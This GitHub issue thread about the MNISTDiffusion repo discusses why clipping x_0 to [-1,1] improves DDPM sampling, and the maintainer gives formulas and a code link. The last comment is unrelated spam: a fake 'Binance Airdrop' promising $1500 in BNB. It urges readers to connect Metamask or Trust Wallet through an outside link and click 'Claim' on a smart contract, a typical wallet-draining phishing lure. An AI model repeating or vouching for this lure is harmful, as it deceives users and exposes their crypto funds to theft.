### ISSUE TITLE
clip vs no-clip sampling

### ISSUE THREAD

**Issue by ariel415el** [bot66/MNISTDiffusion#2]
Hi,
Thank you for this wonderful repo.

It seems like the clip version of the sampling works better.
Can you explain what is the used sampling algorithm? no-clip seem like the original sampling algorithm

Thanks

**Comment by bot66** [comment]
Hi, @ariel415el 

Thanks for your attention! Clipping the `x_0` yields better results, it's because we know that `x_0` has the `[-1,1]` distribution(`x_0` is the normed input image, we norm the image to `[-1,1]` during the training process), and then we use the clipped `x_0` to compute our mean and std for every timestep instead of only using the `x_t`. And I believe [the original DDPM implementation](https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/diffusion_utils_2.py#L151) also uses the clipped `x_0` trick.

All these two methods come from the theory of the reverse diffusion process.
Here is what you can find in [Lilian Weng's  Blog](https://lilianweng.github.io/posts/2021-07-11-diffusion-models/):

1. We know how to compute `x_0`:

$$\mathbf{x}_0 = \frac{1}{\sqrt{\bar{\alpha}_t}}(\mathbf{x}_t - \sqrt{1 - \bar{\alpha}_t}\boldsymbol{\epsilon}_t)$$

2. And we compute `mean` as ( use `x_0`,  so we can clip it !):
![Screenshot from 2023-11-20 09-51-54](https://github.com/bot66/MNISTDiffusion/assets/26666338/77893046-d620-452e-ac67-6479f0736b37)

3. Or(not use `x_0`, no clipped `x_0`):
![Screenshot from 2023-11-20 09-51-37](https://github.com/bot66/MNISTDiffusion/assets/26666338/6ce4a6a2-26eb-462c-bd22-f0d7a6c34ff8)

In conclusion, the clipped `x_0` sampling method yields better results, it's because we have more stable values, and it's a free trick!
If we use more advanced training techniques, clipping the `x_0` will not be required.

If you have any other questions, please let me know!

**Comment by ariel415el** [comment]
Thank you for your answer, From what I get the clipping trick is simply to clip x_0 to [-1,1] whenever you use it in the sampling process?

**Comment by bot66** [comment]
@ariel415el Yes, the code is here.
https://github.com/bot66/MNISTDiffusion/blob/c7ba8e09174cbb88b9cc314db3bf2e514668681c/model.py#L102

**Comment by BhavyClover** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
